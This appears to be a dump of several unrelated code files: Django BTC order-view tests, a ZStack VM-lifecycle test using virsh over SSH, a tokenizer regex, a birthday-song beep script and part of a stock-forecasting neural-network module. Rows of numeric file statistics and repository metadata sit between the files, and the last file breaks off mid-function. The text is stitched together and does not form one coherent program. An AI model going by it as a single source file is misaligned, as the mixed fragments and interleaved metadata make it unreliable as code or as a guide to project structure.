u = User.objects.create_user(username='user', email='a@user.com', password='pas$4W0rd')
self.ba = BillingAccount.objects.create(user=u)
self.client.login(username='user', password='pas$4W0rd')
self.resp = self.client.post(r('core:sell-order'), {'amount_brl': 2.5, 'amount_btc': 0.5})
def test_success(self):
"""POST /sell-order should redirect to index."""
self.assertRedirects(self.resp, r('core:index'))
def test_order_created(self):
"""Order should be created in database."""
self.assertTrue(BTCSellOrder.objects.exists())
class BTCBuyOrderViewTest(test.TestCase):
def setUp(self):
u = User.objects.create_user(username='user', email='a@user.com', password='pas$4W0rd')
self.ba = BillingAccount.objects.create(user=u)
self.client.login(username='user', password='pas$4W0rd')
self.resp = self.client.post(r('core:buy-order'), {'amount_brl': 2.5, 'amount_btc': 0.5})
def test_success(self):
"""POST /sell-order should redirect to index."""
self.assertRedirects(self.resp, r('core:index'))
def test_order_created(self):
"""Order should be created in database."""
self.assertTrue(BTCBuyOrder.objects.exists())
class BTCBuyOrderViewErrorTest(test.TestCase):
def setUp(self):
u = User.objects.create_user(username='user', email='a@user.com', password='pas$4W0rd')
self.ba = BillingAccount.objects.create(user=u)
self.client.login(username='user', password='pas$4W0rd')
self.resp = self.client.post(r('core:buy-order'), {'amount_brl': 2.5, 'amount_btc': ''})
def test_success(self):
"""POST /sell-order should redirect to index."""
self.assertRedirects(self.resp, r('core:index'))
def test_order_not_created(self):
"""Order should not be created in database."""
self.assertFalse(BTCBuyOrder.objects.exists())
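# The three test cases above share an identical fixture; a hedged sketch of how
# the duplication could be factored out (OrderViewMixin and its attributes are
# hypothetical, not part of trader.core):
class OrderViewMixin:
    url_name = None    # e.g. 'core:sell-order'
    post_data = None   # e.g. {'amount_brl': 2.5, 'amount_btc': 0.5}
    def setUp(self):
        u = User.objects.create_user(username='user', email='a@user.com', password='pas$4W0rd')
        self.ba = BillingAccount.objects.create(user=u)
        self.client.login(username='user', password='pas$4W0rd')
        self.resp = self.client.post(r(self.url_name), self.post_data)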
| 41.269231
| 98
| 0.670084
| 280
| 2,146
| 5.067857
| 0.217857
| 0.054968
| 0.071882
| 0.084567
| 0.794926
| 0.794926
| 0.794926
| 0.794926
| 0.794926
| 0.794926
| 0
| 0.012436
| 0.175676
| 2,146
| 52
| 99
| 41.269231
| 0.789712
| 0.11137
| 0
| 0.636364
| 0
| 0
| 0.128396
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.272727
| false
| 0.181818
| 0.090909
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b79e6256ceab1bdbadea2081a013ceb41fff35a1
| 4,015
|
py
|
Python
|
integrationtest/vm/basic/test_MN_examine_vm_state.py
|
sherry546/zstack-woodpecker
|
54a37459f2d72ce6820974feaa6eb55772c3d2ce
|
[
"Apache-2.0"
] | 1
|
2021-03-21T12:41:11.000Z
|
2021-03-21T12:41:11.000Z
|
integrationtest/vm/basic/test_MN_examine_vm_state.py
|
sherry546/zstack-woodpecker
|
54a37459f2d72ce6820974feaa6eb55772c3d2ce
|
[
"Apache-2.0"
] | null | null | null |
integrationtest/vm/basic/test_MN_examine_vm_state.py
|
sherry546/zstack-woodpecker
|
54a37459f2d72ce6820974feaa6eb55772c3d2ce
|
[
"Apache-2.0"
] | 1
|
2017-05-19T06:40:40.000Z
|
2017-05-19T06:40:40.000Z
|
'''
Test MN monitor VM lifecycle START->RUNNING->STOPPED->RUNNING->PAUSED->RUNNING->PAUSED->STOPPED
@author:Mengying.li
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import test_stub
import time
vm=None
def test():
global vm
vm=test_stub.create_vm()
vm.check()
vm_inv=vm.get_vm()
vm_uuid=vm_inv.uuid
vm_state = vm.get_vm().state
host_inv = test_lib.lib_find_host_by_vm(vm_inv)
host_ip= host_inv.managementIp
host_username=host_inv.username
host_password=host_inv.password
test_util.test_dsc('use virsh to stop vm in host')
cmd='virsh destroy %s'% (vm_uuid)
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd, 180)
if result is False:
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
if vm.get_vm().state == 'Stopped':
break
time.sleep(1)
if vm.get_vm().state != 'Stopped':
test_util.test_fail('VM is expected to be in state Stopped, while it is %s' % (vm.get_vm().state))
test_util.test_dsc('use virsh to start vm in host')
cmd = 'virsh start %s' % vm_uuid
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd,180)
if result is False:
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
if vm.get_vm().state == 'Running':
break
time.sleep(1)
if vm.get_vm().state != 'Running':
test_util.test_fail('VM is expected to be in state Running, while it is %s' % (vm.get_vm().state))
test_util.test_dsc('use virsh to suspend vm in host')
cmd = 'virsh suspend %s' % vm_uuid
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd,180)
if result is False:
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
test_util.test_logger('%s' % vm.get_vm().state)
if vm.get_vm().state == 'Paused':
break
time.sleep(1)
if vm.get_vm().state != 'Paused':
test_util.test_fail('VM is expected to be in state Paused, while it is %s' % (vm.get_vm().state))
test_util.test_dsc('use virsh to resume vm in host')
cmd = 'virsh resume %s' % vm_uuid
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd,180)
if result is False:
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
if vm.get_vm().state == 'Running':
break
time.sleep(1)
if vm.get_vm().state != 'Running':
test_util.test_fail('VM is expected to be in state Running, while it is %s' % (vm.get_vm().state))
test_util.test_dsc('use virsh to suspend vm in host')
cmd = 'virsh suspend %s' % vm_uuid
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd,180)
if result is False:
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
test_util.test_logger('%s' % vm.get_vm().state)
if vm.get_vm().state == 'Paused':
break
time.sleep(1)
if vm.get_vm().state != 'Paused':
test_util.test_fail('VM is expected to be in state Paused, while it is %s' % (vm.get_vm().state))
test_util.test_dsc('use virsh to stop vm in host')
cmd='virsh destroy %s'% (vm_uuid)
result=test_lib.lib_execute_ssh_cmd(host_ip, host_username, host_password, cmd, 180)
if result is False:
test_util.test_fail('Fail to execute cmd')
for i in range(0, 60):
vm.update()
if vm.get_vm().state == 'Stopped':
break
time.sleep(1)
if vm.get_vm().state != 'Stopped':
test_util.test_fail('VM is expected to be in state Stopped, while it is %s' % (vm.get_vm().state))
vm.destroy()
vm.check()
test_util.test_pass('Test Success')
def error_cleanup():
global vm
if vm:
vm.destroy()
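# Each virsh transition above repeats the same poll-and-check loop; a hedged
# refactoring sketch (wait_for_vm_state is hypothetical, not part of test_stub
# or zstackwoodpecker):
def wait_for_vm_state(vm, expected, timeout=60):
    for _ in range(timeout):
        vm.update()
        if vm.get_vm().state == expected:
            return
        time.sleep(1)
    test_util.test_fail('VM is expected to be in state %s, while it is %s' % (expected, vm.get_vm().state))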
| 31.124031
| 102
| 0.637858
| 637
| 4,015
| 3.805338
| 0.11303
| 0.075908
| 0.063531
| 0.10396
| 0.793729
| 0.780528
| 0.780528
| 0.780528
| 0.780528
| 0.780528
| 0
| 0.013694
| 0.236115
| 4,015
| 128
| 103
| 31.367188
| 0.776655
| 0.028643
| 0
| 0.762887
| 0
| 0
| 0.197636
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020619
| false
| 0.082474
| 0.041237
| 0
| 0.061856
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b7c6e6b363944a42f6e612f9e9b8e2afb53bf385
| 125
|
py
|
Python
|
__init__.py
|
xuwenyihust/Lunatic
|
d0be34065c716f166cfba992cfcbb9afeffc2167
|
[
"MIT"
] | 39
|
2017-09-25T10:54:50.000Z
|
2020-11-10T03:18:53.000Z
|
__init__.py
|
xuwenyihust/Lunatic
|
d0be34065c716f166cfba992cfcbb9afeffc2167
|
[
"MIT"
] | 56
|
2017-05-06T23:44:04.000Z
|
2020-02-16T08:14:15.000Z
|
__init__.py
|
xuwenyihust/Lunatic
|
d0be34065c716f166cfba992cfcbb9afeffc2167
|
[
"MIT"
] | 2
|
2017-10-03T11:24:14.000Z
|
2019-05-18T08:29:26.000Z
|
from .src import log_gen
from .src import apache_gen
def help():
return 'lunaticlog: to help you generate fake log loads.'
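# Example use after installing the package (assuming it is importable as
# `lunaticlog`, per the message above):
#     >>> import lunaticlog
#     >>> lunaticlog.help()
#     'lunaticlog: to help you generate fake log loads.'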
| 20.833333
| 58
| 0.76
| 21
| 125
| 4.428571
| 0.714286
| 0.150538
| 0.27957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.168
| 125
| 5
| 59
| 25
| 0.894231
| 0
| 0
| 0
| 1
| 0
| 0.384
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 8
|
b7d2c0d1ebf7804ecf65d7081eeb22e80f9df7d3
| 197
|
py
|
Python
|
simplemma/tokenizer.py
|
adbar/simplemma
|
c4d0f3ff13f567d5c581f7408ead1df4753bb5b8
|
[
"BSD-2-Clause",
"CC-BY-4.0",
"MIT"
] | 22
|
2021-01-18T22:14:51.000Z
|
2022-03-18T04:32:29.000Z
|
simplemma/tokenizer.py
|
adbar/simplemma
|
c4d0f3ff13f567d5c581f7408ead1df4753bb5b8
|
[
"BSD-2-Clause",
"CC-BY-4.0",
"MIT"
] | 9
|
2021-01-18T17:50:44.000Z
|
2022-03-26T02:23:14.000Z
|
simplemma/tokenizer.py
|
adbar/simplemma
|
c4d0f3ff13f567d5c581f7408ead1df4753bb5b8
|
[
"BSD-2-Clause",
"CC-BY-4.0",
"MIT"
] | 1
|
2021-10-21T06:58:08.000Z
|
2021-10-21T06:58:08.000Z
|
"""Parts related to tokenization."""
import re
TOKREGEX = re.compile(r'(?:(?:[0-9][0-9.,:%-]*|St\.)[\w_€-]+|https?://[^ ]+|[@#§$]?\w[\w*_-]*|[,;:\.?!¿¡‽⸮…()\[\]–{}—/‒_“„”’′″‘’“”\'"«»=+−×÷•·]+)')
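# Illustrative usage sketch (not part of the original file): the compiled
# pattern is intended for findall-style tokenization, e.g.
#   tokens = TOKREGEX.findall("Today, it costs 3.50€.")
# which yields the words, the combined number+currency token ('3.50€') and the
# punctuation marks as separate tokens.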
| 32.833333
| 147
| 0.350254
| 29
| 197
| 3.068966
| 0.827586
| 0.044944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021622
| 0.060914
| 197
| 5
| 148
| 39.4
| 0.335135
| 0.152284
| 0
| 0
| 0
| 0.5
| 0.664596
| 0.658385
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
4d21fc6b113776a3fb393dc38d7799bced3c43cd
| 5,166
|
py
|
Python
|
hbd.py
|
SyahirahWanMin/HBD
|
32062c9dd5795c5911c7ed1d89fa5eb1103d7d92
|
[
"MIT"
] | null | null | null |
hbd.py
|
SyahirahWanMin/HBD
|
32062c9dd5795c5911c7ed1d89fa5eb1103d7d92
|
[
"MIT"
] | null | null | null |
hbd.py
|
SyahirahWanMin/HBD
|
32062c9dd5795c5911c7ed1d89fa5eb1103d7d92
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import time
import sys
try:
import winsound
except ImportError:
import os
name = input("What is your name? ")
try:
winsound.Beep(264, 250)
sys.stdout.write('Ha')
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
winsound.Beep(264, 250)
time.sleep(250/2000.0)
sys.stdout.write('birth')
winsound.Beep(297, 1000)
time.sleep(250/2000.0)
sys.stdout.write('day ')
winsound.Beep(264, 1000)
time.sleep(250/2000.0)
sys.stdout.write('to ')
winsound.Beep(352, 1000)
time.sleep(250/2000.0)
print('you')
winsound.Beep(330, 2000)
time.sleep(500/2000.0)
sys.stdout.write('Ha')
winsound.Beep(264, 250)
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
winsound.Beep(264, 250)
time.sleep(250/2000.0)
sys.stdout.write('birth')
winsound.Beep(297, 1000)
time.sleep(250/2000.0)
sys.stdout.write('day ')
winsound.Beep(264, 1000)
time.sleep(250/2000.0)
sys.stdout.write('to ')
winsound.Beep(396, 1000)
time.sleep(250/2000.0)
print('you')
winsound.Beep(352, 2000)
time.sleep(500/2000.0)
sys.stdout.write('Ha')
winsound.Beep(264, 250)
time.sleep(250/2000.0)
sys.stdout.write('ppy ')
winsound.Beep(264, 500)
time.sleep(250/1000.0)
sys.stdout.write('birth')
winsound.Beep(440, 1000)
time.sleep(250/2000.0)
sys.stdout.write('day ')
winsound.Beep(352, 1000)
time.sleep(250/2000.0)
sys.stdout.write('dear ')
winsound.Beep(330, 1000)
print(name)
time.sleep(250/2000.0)
winsound.Beep(297, 1000)
winsound.Beep(440, 1000)
time.sleep(250/2000.0)
time.sleep(500/2000.0)
sys.stdout.write('Ha')
winsound.Beep(466, 250)
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
winsound.Beep(466, 250)
time.sleep(250/2000.0)
sys.stdout.write('birth')
winsound.Beep(440, 1000)
time.sleep(250/2000.0)
sys.stdout.write('day ')
winsound.Beep(352, 1000)
time.sleep(250/2000.0)
sys.stdout.write('to ')
winsound.Beep(396, 1000)
time.sleep(250/2000.0)
print('you')
winsound.Beep(352, 2000)
time.sleep(250/2000.0)
except:
os.system('beep -f 264 -l 250')
sys.stdout.write('Ha')
sys.stdout.flush()
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
sys.stdout.flush()
os.system('beep -f 264 -l 250')
time.sleep(250/2000.0)
sys.stdout.write('birth')
sys.stdout.flush()
os.system('beep -f 297 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('day ')
sys.stdout.flush()
os.system('beep -f 264 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('to ')
sys.stdout.flush()
os.system('beep -f 352 -l 1000')
time.sleep(250/2000.0)
print ('you')
os.system('beep -f 330 -l 2000')
time.sleep(500/2000.0)
sys.stdout.write('Ha')
sys.stdout.flush()
os.system('beep -f 264 -l 250')
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
sys.stdout.flush()
os.system('beep -f 264 -l 250')
time.sleep(250/2000.0)
sys.stdout.write('birth')
sys.stdout.flush()
os.system('beep -f 297 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('day ')
sys.stdout.flush()
os.system('beep -f 264 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('to ')
sys.stdout.flush()
os.system('beep -f 396 -l 1000')
time.sleep(250/2000.0)
print ('you')
os.system('beep -f 352 -l 2000')
time.sleep(500/2000.0)
sys.stdout.write('Ha')
sys.stdout.flush()
os.system('beep -f 264 -l 250')
time.sleep(250/2000.0)
sys.stdout.write('ppy ')
sys.stdout.flush()
os.system('beep -f 264 -l 500')
time.sleep(250/1000.0)
sys.stdout.write('birth')
sys.stdout.flush()
os.system('beep -f 440 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('day ')
sys.stdout.flush()
os.system('beep -f 352 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('dear ')
sys.stdout.flush()
os.system('beep -f 330 -l 1000')
print (name)
time.sleep(250/2000.0)
os.system('beep -f 297 -l 1000')
os.system('beep -f 440 -l 1000')
time.sleep(250/2000.0)
time.sleep(500/2000.0)
sys.stdout.write('Ha')
sys.stdout.flush()
os.system('beep -f 466 -l 250')
time.sleep(500/2000.0)
sys.stdout.write('ppy ')
sys.stdout.flush()
os.system('beep -f 466 -l 250')
time.sleep(250/2000.0)
sys.stdout.write('birth')
sys.stdout.flush()
os.system('beep -f 440 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('day ')
sys.stdout.flush()
os.system('beep -f 352 -l 1000')
time.sleep(250/2000.0)
sys.stdout.write('to ')
sys.stdout.flush()
os.system('beep -f 396 -l 1000')
time.sleep(250/2000.0)
print ('you')
os.system('beep -f 352 -l 2000')
time.sleep(250/2000.0)
print ('HAPPY BIRTHDAY ' + name + ' <3 !!!')
print (" --------------------------------------------------------------------------------------------------------")
print (" | | | | /\ | __ \ | __ \ \ \ / / | _ \|_ _|| __ \|__ __|| | | || __ \ /\ \ \ / /")
print (" | |__| | / \ | |__) || |__) | \ \_/ / | |_) | | | | |__) | | | | |__| || | | | / \ \ \_/ / ")
print (" | __ | / /\ \ | ___/ | ___/ \ / | _ < | | | _ / | | | __ || | | | / /\ \ \ / ")
print (" | | | | / ____ \ | | | | | | | |_) |_| |_ | | \ \ | | | | | || |__| |/ ____ \ | | ")
print (" |_| |_|/_/ \_\|_| |_| |_| |____/|_____||_| \_\ |_| |_| |_||_____//_/ \_\|_| ")
| 25.448276
| 117
| 0.60511
| 796
| 5,166
| 3.817839
| 0.059045
| 0.17769
| 0.184271
| 0.187562
| 0.936821
| 0.920698
| 0.90951
| 0.877262
| 0.857519
| 0.84666
| 0
| 0.169707
| 0.161634
| 5,166
| 203
| 118
| 25.448276
| 0.531979
| 0
| 0
| 0.886486
| 0
| 0.027027
| 0.253726
| 0.020128
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032432
| 0
| 0.032432
| 0.086486
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4d446b00a09696777e851be5c2f0060e65305da8
| 18,637
|
py
|
Python
|
gamestonk_terminal/prediction_techniques/neural_networks_view.py
|
DT021/GamestonkTerminal
|
10d231ec2f86a19e69fdb65a2f4d37f33f723f6a
|
[
"MIT"
] | 1
|
2021-07-25T20:34:29.000Z
|
2021-07-25T20:34:29.000Z
|
gamestonk_terminal/prediction_techniques/neural_networks_view.py
|
DT021/GamestonkTerminal
|
10d231ec2f86a19e69fdb65a2f4d37f33f723f6a
|
[
"MIT"
] | 1
|
2022-02-10T06:49:37.000Z
|
2022-02-10T06:49:37.000Z
|
gamestonk_terminal/prediction_techniques/neural_networks_view.py
|
DT021/GamestonkTerminal
|
10d231ec2f86a19e69fdb65a2f4d37f33f723f6a
|
[
"MIT"
] | null | null | null |
""" Neural Networks View"""
__docformat__ = "numpy"
from typing import List, Any
import traceback
import numpy as np
import pandas as pd
from tensorflow.keras.callbacks import EarlyStopping
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import (
LSTM,
SimpleRNN,
Dense,
Dropout,
Conv1D,
MaxPool1D,
AvgPool1D,
Flatten,
)
from tensorflow.keras.optimizers import (
Adam,
Adamax,
Adagrad,
Adadelta,
Ftrl,
Nadam,
RMSprop,
SGD,
)
from gamestonk_terminal.helper_funcs import get_next_stock_market_days
from gamestonk_terminal.prediction_techniques.pred_helper import (
prepare_scale_train_valid_test,
forecast,
plot_data_predictions,
parse_args,
restore_env,
print_pretty_prediction,
)
from gamestonk_terminal import config_neural_network_models as cfg_nn_models
optimizers = {
"Adam": Adam,
"Adagrad": Adagrad,
"Adadelta": Adadelta,
"Adamax": Adamax,
"Ftrl": Ftrl,
"Nadam": Nadam,
"Rmsprop": RMSprop,
"Ggd": SGD,
}
if cfg_nn_models.Early_Stop_Patience:
es = EarlyStopping(monitor="val_loss", patience=cfg_nn_models.Early_Stop_Patience)
else:
# Set patience to very long value
es = EarlyStopping(monitor="val_loss", patience=1000)
def build_neural_network_model(
Recurrent_Neural_Network: List[Any], n_inputs: int, n_days: int
) -> Sequential:
"""
Builds neural net from config_neural_network_models.py
Parameters
----------
Recurrent_Neural_Network: List[Any]
List of layers with parameters as a dictionary in the file
n_inputs: int
Number of days that will be fed into the NN
n_days: int
Number of days the NN wants to predict
Returns
-------
model: Sequential
Keras sequential model with layers from the file
"""
model = Sequential()
for idx_layer, d_layer in enumerate(Recurrent_Neural_Network):
# Recurrent Neural Network
if str(*d_layer) == "SimpleRNN":
# Is this the input layer? If so, define input_shape
if idx_layer == 0:
model.add(SimpleRNN(**d_layer["SimpleRNN"], input_shape=(n_inputs, 1)))
# Is this the last output layer? If so, set units to prediction days
elif idx_layer == (len(Recurrent_Neural_Network) - 1):
model.add(SimpleRNN(**d_layer["SimpleRNN"], units=n_days))
else:
model.add(SimpleRNN(**d_layer["SimpleRNN"]))
# Long-Short Term-Memory
elif str(*d_layer) == "LSTM":
# Is this the input layer? If so, define input_shape
if idx_layer == 0:
model.add(LSTM(**d_layer["LSTM"], input_shape=(n_inputs, 1)))
# Is this the last output layer? If so, set units to prediction days
elif idx_layer == (len(Recurrent_Neural_Network) - 1):
model.add(LSTM(**d_layer["LSTM"], units=n_days))
else:
model.add(LSTM(**d_layer["LSTM"]))
# Dense (Simple Neuron)
elif str(*d_layer) == "Dense":
# Is this the input layer? If so, define input_shape
if idx_layer == 0:
model.add(Dense(**d_layer["Dense"], input_dim=n_inputs))
# Is this the last output layer? If so, set units to prediction days
elif idx_layer == (len(Recurrent_Neural_Network) - 1):
model.add(Dense(**d_layer["Dense"], units=n_days))
else:
model.add(Dense(**d_layer["Dense"]))
# Conv1D Layer
elif str(*d_layer) == "Conv1D":
if idx_layer == 0:
model.add(Conv1D(**d_layer["Conv1D"], input_shape=(n_inputs, 1)))
else:
model.add(Conv1D(**d_layer["Conv1D"]))
# Max Pooling Layer for after Conv Layer
elif str(*d_layer) == "MaxPool1D":
model.add(MaxPool1D(**d_layer["MaxPool1D"]))
# Allow for if user wants to do average pooling
elif str(*d_layer) == "AvgPool1D":
model.add(AvgPool1D(**d_layer["AvgPool1D"]))
# Dropout (Regularization)
elif str(*d_layer) == "Dropout":
model.add(Dropout(**d_layer["Dropout"]))
# Flatten layer for Convolutions
elif str(*d_layer) == "Flatten":
model.add(Flatten())
else:
print(f"Incorrect neuron type: {str(*d_layer)}")
return model
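# Illustrative only (not from the original repository): an example of the
# layer-list format that build_neural_network_model() consumes. Each entry is
# a single-key dict whose key names the layer type and whose value holds the
# keyword arguments forwarded to the matching Keras layer; the specific values
# below are assumptions for illustration. The last entry should omit "units",
# since the function injects units=n_days for the final layer.
# Example_Recurrent_Neural_Network = [
#     {"SimpleRNN": {"units": 50, "activation": "relu", "return_sequences": True}},
#     {"Dropout": {"rate": 0.2}},
#     {"SimpleRNN": {"units": 25, "activation": "relu", "return_sequences": False}},
#     {"Dense": {"activation": "relu"}},
# ]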
def mlp(other_args: List[str], s_ticker: str, df_stock: pd.DataFrame):
"""
Train a multi-layer perceptron model
Parameters
----------
other_args: List[str]
Argparse Arguments
s_ticker: str
Ticker
df_stock: pd.DataFrame
Loaded stock dataframe
"""
try:
ns_parser = parse_args(
prog="mlp",
description="""Multi-Layered-Perceptron. """,
other_args=other_args,
)
if not ns_parser:
return
(
X_train,
X_valid,
y_train,
y_valid,
_,
_,
_,
y_dates_valid,
forecast_data_input,
dates_forecast_input,
scaler,
is_error,
) = prepare_scale_train_valid_test(df_stock["Adj Close"], ns_parser)
if is_error:
return
print(
f"Training on {X_train.shape[0]} sequences of length {X_train.shape[1]}. Using {X_valid.shape[0]} sequences "
f" of length {X_valid.shape[1]} for validation. Model will run {ns_parser.n_loops} loops"
)
future_dates = get_next_stock_market_days(
dates_forecast_input[-1], n_next_days=ns_parser.n_days
)
preds = np.zeros((ns_parser.n_loops, X_valid.shape[0], ns_parser.n_days))
forecast_data = np.zeros((ns_parser.n_loops, ns_parser.n_days))
for i in range(ns_parser.n_loops):
# Build Neural Network model
model = build_neural_network_model(
cfg_nn_models.Long_Short_Term_Memory,
ns_parser.n_inputs,
ns_parser.n_days,
)
model.compile(
optimizer=optimizers[cfg_nn_models.Optimizer](
learning_rate=ns_parser.lr
),
loss=cfg_nn_models.Loss,
)
model.fit(
X_train.reshape(X_train.shape[0], X_train.shape[1], 1),
y_train,
epochs=ns_parser.n_epochs,
verbose=True,
batch_size=ns_parser.n_batch_size,
validation_data=(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1),
y_valid,
),
callbacks=[es],
)
preds[i] = model.predict(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1)
).reshape(X_valid.shape[0], ns_parser.n_days)
forecast_data[i] = forecast(
forecast_data_input, future_dates, model, scaler
).values.flat
forecast_data_df = pd.DataFrame(forecast_data.T, index=future_dates)
if ns_parser.n_loops > 1:
forecast_data_df["Median"] = forecast_data_df.median(axis=1)
print_pretty_prediction(
forecast_data_df["Median"], df_stock["Adj Close"].values[-1]
)
else:
print_pretty_prediction(
forecast_data_df[0], df_stock["Adj Close"].values[-1]
)
plot_data_predictions(
df_stock,
np.median(preds, axis=0),
y_valid,
y_dates_valid,
scaler,
f"MLP Model on {s_ticker}",
forecast_data_df,
ns_parser.n_loops,
)
print("")
except Exception as e:
print(e)
traceback.print_exc()
print("")
finally:
restore_env()
def rnn(other_args: List[str], s_ticker: str, df_stock: pd.DataFrame):
"""
Train a Recurrent Neural Network (rnn)
Parameters
----------
other_args:List[str]
Argparse arguments
s_ticker: str
Stock ticker
df_stock: pd.DataFrame
Dataframe of stock prices
"""
try:
ns_parser = parse_args(
prog="lstm",
description="""Long-Short Term Memory. """,
other_args=other_args,
)
if not ns_parser:
return
(
X_train,
X_valid,
y_train,
y_valid,
_,
_,
_,
y_dates_valid,
forecast_data_input,
dates_forecast_input,
scaler,
is_error,
) = prepare_scale_train_valid_test(df_stock["Adj Close"], ns_parser)
if is_error:
return
print(
f"Training on {X_train.shape[0]} sequences of length {X_train.shape[1]}. Using {X_valid.shape[0]} sequences "
f" of length {X_valid.shape[1]} for validation. Model will run {ns_parser.n_loops} loops"
)
future_dates = get_next_stock_market_days(
dates_forecast_input[-1], n_next_days=ns_parser.n_days
)
preds = np.zeros((ns_parser.n_loops, X_valid.shape[0], ns_parser.n_days))
forecast_data = np.zeros((ns_parser.n_loops, ns_parser.n_days))
for i in range(ns_parser.n_loops):
# Build Neural Network model
model = build_neural_network_model(
cfg_nn_models.Long_Short_Term_Memory,
ns_parser.n_inputs,
ns_parser.n_days,
)
model.compile(
optimizer=optimizers[cfg_nn_models.Optimizer](
learning_rate=ns_parser.lr
),
loss=cfg_nn_models.Loss,
)
model.fit(
X_train.reshape(X_train.shape[0], X_train.shape[1], 1),
y_train,
epochs=ns_parser.n_epochs,
verbose=True,
batch_size=ns_parser.n_batch_size,
validation_data=(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1),
y_valid,
),
callbacks=[es],
)
preds[i] = model.predict(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1)
).reshape(X_valid.shape[0], ns_parser.n_days)
forecast_data[i] = forecast(
forecast_data_input, future_dates, model, scaler
).values.flat
forecast_data_df = pd.DataFrame(forecast_data.T, index=future_dates)
if ns_parser.n_loops > 1:
forecast_data_df["Median"] = forecast_data_df.median(axis=1)
print_pretty_prediction(
forecast_data_df["Median"], df_stock["Adj Close"].values[-1]
)
else:
print_pretty_prediction(
forecast_data_df[0], df_stock["Adj Close"].values[-1]
)
plot_data_predictions(
df_stock,
np.median(preds, axis=0),
y_valid,
y_dates_valid,
scaler,
f"RNN Model on {s_ticker}",
forecast_data_df,
ns_parser.n_loops,
)
print("")
except Exception as e:
print(e)
traceback.print_exc()
print("")
finally:
restore_env()
def lstm(other_args: List[str], s_ticker: str, df_stock: pd.DataFrame):
"""
Train a Long-Short-Term-Memory Neural Net (lstm)
Parameters
----------
other_args:List[str]
Argparse arguments
s_ticker: str
Stock ticker
df_stock: pd.DataFrame
Dataframe of stock prices
"""
try:
ns_parser = parse_args(
prog="lstm",
description="""Long-Short Term Memory. """,
other_args=other_args,
)
if not ns_parser:
return
(
X_train,
X_valid,
y_train,
y_valid,
_,
_,
_,
y_dates_valid,
forecast_data_input,
dates_forecast_input,
scaler,
is_error,
) = prepare_scale_train_valid_test(df_stock["Adj Close"], ns_parser)
if is_error:
return
print(
f"Training on {X_train.shape[0]} sequences of length {X_train.shape[1]}. Using {X_valid.shape[0]} sequences "
f" of length {X_valid.shape[1]} for validation. Model will run {ns_parser.n_loops} loops"
)
future_dates = get_next_stock_market_days(
dates_forecast_input[-1], n_next_days=ns_parser.n_days
)
preds = np.zeros((ns_parser.n_loops, X_valid.shape[0], ns_parser.n_days))
forecast_data = np.zeros((ns_parser.n_loops, ns_parser.n_days))
for i in range(ns_parser.n_loops):
# Build Neural Network model
model = build_neural_network_model(
